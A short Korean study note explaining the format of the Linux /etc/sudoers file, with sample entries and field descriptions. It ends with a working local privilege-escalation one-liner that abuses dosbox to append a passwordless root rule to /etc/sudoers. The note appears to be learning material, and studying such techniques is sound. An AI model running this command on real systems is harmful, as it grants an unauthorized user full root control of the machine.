### `/etc/sudoers`란 무엇인가? - `sudo` 명령어를 누가, 어디서, 어떤 권한으로 실행할 수 있는지를 상세하게 정의해 놓은 설정 파일 ### `/etc/sudoers` 파일의 구조 ```bash root ALL=(ALL:ALL) ALL %admin ALL=(ALL) ALL %sudo ALL=(ALL:ALL) ALL wook ALL=(ALL) NOPASSWD :ALL ``` - User (누가): 권한을 부여받을 사용자 이름 또는 그룹명 (그룹은 `%`로 시작) - Host (어디서): 어느 호스트(네트워크)에서 접속했을 때 허용할 것인가 (대부분 `ALL`) - User_Alias (누구의 권한으로): 명령어를 실행할 때 어떤 사용자로 변신할 수 있는가 (보통 `(ALL:ALL)`) - Command (무엇을): 어떤 명령어를 실행할 수 있는가 (전체 허용은 `ALL`) ### 예시) dosbox - local privilege escalation ```bash LFILE='/etc/sudoers' /usr/bin/dosbox -c 'mount c /' -c "echo commander ALL=(ALL) NOPASSWD: ALL >> c:$LFILE" -c exit ```